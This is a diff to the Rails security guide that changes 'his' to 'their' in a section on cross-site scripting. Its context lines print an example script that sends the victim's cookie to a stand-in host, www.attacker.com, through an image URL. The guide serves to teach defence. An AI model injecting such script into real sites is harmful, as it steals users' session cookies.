rails/rails/guides/source/security.md

 <script>document.write(document.cookie);</script>
 ```

-For an attacker, of course, this is not useful, as the victim will see his own cookie.
+For an attacker, of course, this is not useful, as the victim will see their own cookie.
 The next example will try to load an image from the URL http://www.attacker.com/ plus the cookie.
 Of course this URL does not exist, so the browser displays nothing.
-But the attacker can review his web server's access log files to see the victim's cookie.
+But the attacker can review their web server's access log files to see the victim's cookie.

 ```html
 <script>document.write('<img src="http://www.attacker.com/' + document.cookie + '">');</script>